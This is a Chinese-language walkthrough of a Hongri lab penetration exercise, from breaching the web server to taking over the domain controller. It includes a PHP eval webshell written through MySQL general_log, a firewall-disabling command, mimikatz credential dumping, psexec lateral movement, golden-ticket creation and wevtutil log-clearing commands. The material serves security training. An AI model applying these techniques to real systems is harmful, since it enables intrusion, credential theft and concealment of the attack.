红日靶场实战复盘——从外网突破到域控提权的完整攻击链解析

1. 红日靶场环境搭建与初始配置

第一次接触红日靶场时，我被它高度仿真的企业内网环境惊艳到了。这个由红日安全团队打造的靶场平台，完美复现了国内企业常见的网络架构，特别适合练习从外网渗透到内网横向移动的全套技能。靶场包含三台虚拟机：一台对外提供Web服务的Win7主机、一台Win2008域控服务器和一台Win2003域成员服务器，这种架构在很多中小型企业都能见到。

配置环境时有个小细节要注意：Win7需要添加两块网卡。第一块用默认NAT模式模拟公网访问，第二块要手动创建仅主机模式的VMnet2网卡，这是内网通信的关键。三台机器的初始密码都是hognrisec@2019，但登录时会提示密码过期需要修改，这个设计很真实——企业服务器确实会强制定期改密。启动phpStudy服务后，记得检查MySQL是否正常运行，我遇到过服务异常导致后续渗透受阻的情况。

2. 外网信息收集的艺术

信息收集阶段就像侦探破案，每个细节都可能是突破口。用nmap扫描22网段时，发现192.168.22.149开放了80和3306端口。访问Web页面看到PHP探针暴露了绝对路径C:/phpStudy/WWW/，这种信息泄露在真实渗透中经常遇到。更惊喜的是MySQL居然用root/root这种弱口令就能登录，虽然现在企业安全意识提高了，但仍有不少老旧系统存在这类问题。

目录扫描我更喜欢用dirb配合自定义字典，相比默认字典能发现更多隐藏路径。当扫出/phpmyadmin时，心跳都加快了——这意味着可能直接操作数据库。这里有个经验：扫描前最好设置延迟参数（-z 1000），否则可能触发WAF封禁。曾经有次测试忘了加延迟，IP被ban导致后续工作无法开展。

3. MySQL日志写shell的骚操作

在phpMyAdmin里看到general_log默认关闭时，我立刻想到经典的日志写shell技术。通过SET GLOBAL general_log='on'开启日志后，把日志路径指向Web目录C:/phpStudy/WWW/shell.php，然后执行SELECT '<?php @eval($_POST["cmd"]);?>'就能生成一句话木马。这个过程有几个坑要注意：

1. Web目录必须有写权限
2. 路径斜杠要用正斜杠
3. 执行后要立即关闭日志避免留下大量记录

用蚁剑连接时，如果遇到连接失败，可能是杀软拦截了。这时候可以尝试编码器切换为base64，或者修改连接密码为不常见的字符串。成功上线后第一件事就是关闭防火墙，命令netsh advfirewall set allprofiles state off要记牢，否则后续操作可能被拦截。

4. Cobalt Strike的精细化控制

CS作为内网渗透神器，配置时要注意几个关键点。创建HTTP监听器时，端口尽量选8000以上不常见的，避免与企业常规服务冲突。生成payload时建议选择x64架构的exe，现在主流系统基本都是64位了。上传payload后，通过蚁剑的终端执行时可能会遇到权限问题，这时候需要先用whoami /priv查看当前权限，必要时用shell sc create创建服务来绕过限制。

提权到system权限后，我习惯立即做三件事：

1. 修改回连间隔为0（仅限靶场，实战中要设置合理间隔）
2. 抓取明文密码mimikatz sekurlsa::logonpasswords
3. 查看网络配置ipconfig /all确定内网段

5. 内网横向移动实战技巧

发现52网段存在域环境后，信息收集就要更有针对性。net view /domain确认存在GOD域，net group "Domain Admins" /domain查看域管列表。当扫描到域控开放445端口时，SMB横向移动就是首选方案。创建SMB监听器时要注意，隧道类型要选正确，否则psexec横向会失败。

通过psexec横向移动时，输入之前抓取的域账号密码后，监听器要选择SMB类型，目标选择域控IP。成功后立即关闭目标防火墙是标准操作流程。这里有个细节：如果目标系统是Win2008以上，可能需要先执行net use \\目标IP\ipc$ /user:域名\用户名 密码建立IPC连接。

6. 黄金票据制作与权限维持

拿到域控权限后，制作黄金票据是维持访问的关键。需要收集三个核心数据：

1. 域SID：通过whoami /all获取，去掉最后一段
2. krbtgt用户的NTLM hash：用mimikatz提取
3. 域名：大小写必须完全匹配

在CS的"凭证提权"中选择黄金票据功能，填入上述信息后，票据有效期建议设置较长时间（如1年），但实战中要根据目标安全策略调整。制作成功后，用klist命令可以查看当前会话的Kerberos票据，验证是否生效。

7. 痕迹清理的必备姿势

清理痕迹是渗透的最后一步，但绝不是最不重要的一步。除了常规的日志清除命令：

wevtutil cl security wevtutil cl system wevtutil cl application

还需要注意：

1. 删除创建的临时文件
2. 清理回收站
3. 检查计划任务是否留下后门
4. 恢复防火墙规则避免引起怀疑

在靶场练习时，我建议每一步操作都记录时间戳，这样清理时可以精准定位。真实环境中还要考虑安全设备日志、网络流量日志等更多维度。